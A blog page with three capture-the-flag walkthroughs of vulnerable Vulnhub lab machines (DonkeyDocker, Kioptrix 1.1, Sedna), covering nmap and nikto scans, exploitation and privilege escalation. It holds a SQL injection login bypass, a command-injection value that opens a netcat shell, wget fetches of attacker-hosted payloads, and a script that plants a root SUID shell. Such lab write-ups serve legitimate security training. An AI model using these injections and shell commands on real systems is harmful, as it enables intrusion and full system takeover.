Monday, August 14, 2017

DonkeyDocker vulnhub Walkthrough

DonkeyDocker vulnhub Walkthrough

Hello All,

in this article we will explorer a Vunlnhub machine DonkeyDocker a very interesting and easy challenge so let's start our journey .


Download :

url: https://www.vulnhub.com/entry/donkeydocker-1,189/


Information Gathering :

let's fire our best friend nmap to discover running service on the target machine i'm already using kali linux so nmap is already installed by default .
Scanning Web Server running on port 80 :

 index :

let's start dirb to scanning entire website pages .

phpmailer code and example has been found 


Get PHPmailer Version :
Searching for PHP Mailer exploit using exploid-db or kali searchploit  :

 i will use this exploit :
https://www.exploit-db.com/exploits/40974/

 adding the following line to python script :

 # coding: utf-8

 and

target http://192.168.10.67/contact

#python 40974.py

open payload page http://192.168.10.76/exploit.php

it's time to setup netcat listener :




Flag.txt for smith :

SSH Key and connect back to machine using private key :

move ssh keys to attacker machine:

Privilege Escalation :

 refer to two blog post we can run command on Docker host using normal user 

 https://reventlov.com/advisories/using-the-docker-command-to-root-the-host

Thanks .
at No comments:

Saturday, June 17, 2017

Kioptrix: Level 1.1 (#2) Vulnhub Walkthrough

Kioptrix: Level 1.1 (#2)

Hello All,

Today we will start a new vulnHub VM Kioptrix Level 2 :

Level:Easy .

Download:

let's start our Journey with Kioptrix . we will start gathering information about the target and the easy way to begin by using our best friend Nmap :D

1- Information gathering :

root@kali:~# nmap -A -sS -Pn -PP 192.168.100.7

Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-06-16 07:55 AST
Nmap scan report for 192.168.100.7
Host is up (0.00021s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey: 
|   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
|   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_  1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind  2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1            829/udp  status
|_  100024  1            832/tcp  status
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after:  2010-10-08T00:10:47
|_ssl-date: 2017-06-17T10:29:30+00:00; +1d05h34m09s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC4_64_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|_    SSL2_RC2_128_CBC_WITH_MD5
631/tcp  open  ipp      CUPS 1.1
| http-methods: 
|_  Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open  mysql    MySQL (unauthorized)
MAC Address: 00:0C:29:A1:C6:47 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop

Host script results:
|_clock-skew: mean: 1d05h34m09s, deviation: 0s, median: 1d05h34m09s

TRACEROUTE
HOP RTT     ADDRESS
1   0.21 ms 192.168.100.7

Post-scan script results:
| clock-skew: 
|_  1d05h34m09s: Majority of systems scanned
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.26 seconds


let's start using our friend Nikto to list or find any useful files .

root@kali:~# nikto -h 192.168.100.7
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.100.7
+ Target Hostname:    192.168.100.7
+ Target Port:        80
+ Start Time:         2017-06-16 07:57:46 (GMT3)
---------------------------------------------------------------------------
+ Server: Apache/2.0.52 (CentOS)
+ Retrieved x-powered-by header: PHP/4.3.9
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.0.52 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE 
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ Server leaks inodes via ETags, header found with file /manual/, fields: 0x5770d 0x1c42 0xac5f9a00;5770b 0x206 0x84f07cc0 
+ Uncommon header 'tcn' found, with contents: choice
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8346 requests: 1 error(s) and 17 item(s) reported on remote host
+ End Time:           2017-06-16 07:58:23 (GMT3) (37 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


Nothing important found let navigate the Web Server .


I've checked the Login form and it's vulnerable to SQL injection exploit .

I'm using basic SQL injection to bypass authentication user=' or '1'='1  .



We can enter any ip address and press submit .

 let's try a command injection attack by using ; terminator  as below :


According to above result we confirm that this page is vulnerable to command injection exploit .

We can execute net-cat on the target host by using below :

127.0.0.1;/usr/local/bin/nc -l -p 4444 -e /bin/bash


Now we have low level access on the target system let start out Privilege Escalation

Privilege Escalation :


using searchsploit to find Linux 2.6 kernal exploit .


i will use below exploit :

Linux Kernel 2.4.x / 2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' Privilege Escalati | ./linux/local/9545.c



We have a root access :) .

Thank you .


at No comments:

Monday, May 15, 2017

Hackfest2016 CTF Sedna Walkthrough

Hackfest2016: Sedna Walkthrough

This is a vulnerable machine which created for the Hackfest 2016 CTF http://hackfest.ca/

URL :
https://www.vulnhub.com/entry/hackfest2016-sedna,181/

Download :
Sedna.ova (Size: 1.3 GB)
Download (Mirror): https://download.vulnhub.com/hackfest2016/Sedna.ova
Download (Torrent): https://download.vulnhub.com/hackfest2016/Sedna.ova.torrent  






























1-Enumeration is the key :


root@kali:~# nmap -A -sS -Pn -PP 192.168.100.9

Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-05-15 19:23 AST
Nmap scan report for 192.168.100.9
Host is up (0.00036s latency).
Not shown: 989 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 aa:c3:9e:80:b4:81:15:dd:60:d5:08:ba:3f:e0:af:08 (DSA)
|   2048 41:7f:c2:5d:d5:3a:68:e4:c5:d9:cc:60:06:76:93:a5 (RSA)
|_  256 ef:2d:65:85:f8:3a:85:c2:33:0b:7d:f9:c8:92:22:03 (ECDSA)
53/tcp   open  domain      ISC BIND 9.9.5-3-Ubuntu
| dns-nsid:
|_  bind.version: 9.9.5-3-Ubuntu
80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_Hackers
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
110/tcp  open  pop3        Dovecot pop3d
|_pop3-capabilities: UIDL STLS SASL AUTH-RESP-CODE PIPELINING RESP-CODES CAPA TOP
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T19:17:14
|_Not valid after:  2026-10-07T19:17:14
|_ssl-date: TLS randomness does not represent time
111/tcp  open  rpcbind     2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          45895/udp  status
|_  100024  1          57138/tcp  status
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp  open  imap        Dovecot imapd (Ubuntu)
|_imap-capabilities: have more post-login Pre-login STARTTLS ENABLE SASL-IR LOGIN-REFERRALS LITERAL+ capabilities OK listed IDLE LOGINDISABLEDA0001 ID IMAP4rev1
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T19:17:14
|_Not valid after:  2026-10-07T19:17:14
|_ssl-date: TLS randomness does not represent time
445/tcp  open  netbios-ssn Samba smbd 4.1.6-Ubuntu (workgroup: WORKGROUP)
993/tcp  open  ssl/imap    Dovecot imapd (Ubuntu)
|_imap-capabilities: AUTH=PLAINA0001 more Pre-login have ENABLE SASL-IR LOGIN-REFERRALS LITERAL+ capabilities OK listed IDLE post-login ID IMAP4rev1
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T19:17:14
|_Not valid after:  2026-10-07T19:17:14
|_ssl-date: TLS randomness does not represent time
995/tcp  open  ssl/pop3    Dovecot pop3d
|_pop3-capabilities: UIDL AUTH-RESP-CODE SASL(PLAIN) USER PIPELINING RESP-CODES CAPA TOP
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T19:17:14
|_Not valid after:  2026-10-07T19:17:14
|_ssl-date: TLS randomness does not represent time
8080/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
|_  Potentially risky methods: PUT DELETE
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat
MAC Address: 00:0C:29:58:B4:4E (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.4
Network Distance: 1 hop
Service Info: Host: SEDNA; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 6s, deviation: 0s, median: 6s
|_nbstat: NetBIOS name: SEDNA, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Unix (Samba 4.1.6-Ubuntu)
|   NetBIOS computer name: SEDNA
|   Workgroup: WORKGROUP
|_  System time: 2017-05-15T12:24:01-04:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol

TRACEROUTE
HOP RTT     ADDRESS
1   0.36 ms 192.168.100.9

Post-scan script results:
| clock-skew:
|_  6s: Majority of systems scanned
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.80 seconds


2- using nikto to enumrate web apps 

root@kali:~# nikto -h 192.168.100.9
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.100.9
+ Target Hostname:    192.168.100.9
+ Target Port:        80
+ Start Time:         2017-05-15 19:25:28 (GMT3)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x65 0x53fb059bb5bc8 
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ "robots.txt" contains 1 entry which should be manually viewed.
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD 
+ OSVDB-3268: /files/: Directory indexing found.
+ OSVDB-3092: /files/: This might be interesting...
+ OSVDB-3092: /system/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ 7536 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time:           2017-05-15 19:25:45 (GMT3) (17 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested






we will use Unauthenticated Unrestricted File Upload:
    POST /themes/dashboard/assets/plugins/jquery-file-upload/server/php/
    Vulnerable Parameter: files[]


now we will using remote file inclusion using


Adding upload file to WWW in your local machine .



We have remote shell  using www-data user data .

Privilege Escalation 

 i will use to enumerate Linux privilege escalation using any scripts from below url .

 http://netsec.ws/?p=309

by check all installed services we found  chkrootkit is installed .

www-data@Sedna:/etc/chkrootkit$ ./chkrootkit -V
./chkrootkit -V
chkrootkit version 0.49
www-data@Sedna:/etc/chkrootkit$ chkrootkit

and local exploit is :

https://www.exploit-db.com/exploits/33899/


change current working directory to /tmp



Download this C file to tmp folder 

www-data@Sedna:/tmp$ 

www-data@Sedna:/tmp$ wget http://192.168.100.8/test.c
wget http://192.168.100.8/test.c
--2017-05-15 12:48:31--  http://192.168.100.8/test.c
Connecting to 192.168.100.8:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 74 [text/x-csrc]
Saving to: 'test.c'

100%[======================================>] 74          --.-K/s   in 0s      

2017-05-15 12:48:31 (9.45 MB/s) - 'test.c' saved [74/74]

www-data@Sedna:/tmp$ gcc test.c -o test
gcc test.c -o test
test.c: In function 'main':
test.c:5:2: warning: incompatible implicit declaration of built-in function 'execl' [enabled by default]
  execl("/bin/sh", "sh", 0);
  ^
test.c:5:2: warning: missing sentinel in function call [-Wformat=]


www-data@Sedna:/tmp$ ls -la
ls -la
total 32
drwxrwxrwt  5 root     root     4096 May 15 12:48 .
drwxr-xr-x 21 root     root     4096 Oct  7  2016 ..
drwxr-xr-x  2 tomcat7  tomcat7  4096 May 15 12:17 hsperfdata_tomcat7
-rwxrwxrwx  1 www-data www-data 7376 May 15 12:48 test
-rw-rw-rw-  1 www-data www-data   74 May 14 19:38 test.c
drwxr-xr-x  2 tomcat7  root     4096 May 15 12:17 tomcat7-tomcat7-tmp
drwx------  2 root     root     4096 May 15 12:17 vmware-root



www-data@Sedna:/tmp$ ./test
./test
$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

adding update script to /tmp folder 

root@kali:/var/www/html# cat update 
 #!/bin/bash
chown root /tmp/test ; chgrp root /tmp/test ; chmod u+s /tmp/test

$ wget http://192.168.100.8/update
wget http://192.168.100.8/update
--2017-05-15 12:52:45--  http://192.168.100.8/update
Connecting to 192.168.100.8:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 79
Saving to: 'update'

100%[======================================>] 79          --.-K/s   in 0s      

2017-05-15 12:52:45 (9.28 MB/s) - 'update' saved [79/79]

$ ls -la
ls -la
total 36
drwxrwxrwt  5 root     root     4096 May 15 12:52 .
drwxr-xr-x 21 root     root     4096 Oct  7  2016 ..
drwxr-xr-x  2 tomcat7  tomcat7  4096 May 15 12:17 hsperfdata_tomcat7
-rwxrwxrwx  1 www-data www-data 7376 May 15 12:48 test
-rw-rw-rw-  1 www-data www-data   74 May 14 19:38 test.c
drwxr-xr-x  2 tomcat7  root     4096 May 15 12:17 tomcat7-tomcat7-tmp
-rw-rw-rw-  1 www-data www-data   79 May 15 12:52 update
drwx------  2 root     root     4096 May 15 12:17 vmware-root



$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ ./test
$ chmod +x update
chmod +x update
$ ls -la test
ls -la test
-rwsrwxrwx 1 root root 7376 May 15 12:48 test

You can now execute test with root permission .

$ ./test
./test
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
Flags :
# cat /root/flag.txt
cat /root/flag.txt
a10828bee17db751de4b936614558305

# cat /var/www/flag.txt
cat /var/www/flag.txt
bfbb7e6e6e88d9ae66848b9aeac6b289


Thanks a lot .
at No comments:
Subscribe to: Posts (Atom)

DonkeyDocker vulnhub Walkthrough

DonkeyDocker vulnhub Walkthrough Hello All, in this article we will explorer a Vunlnhub machine DonkeyDocker a very interesting an...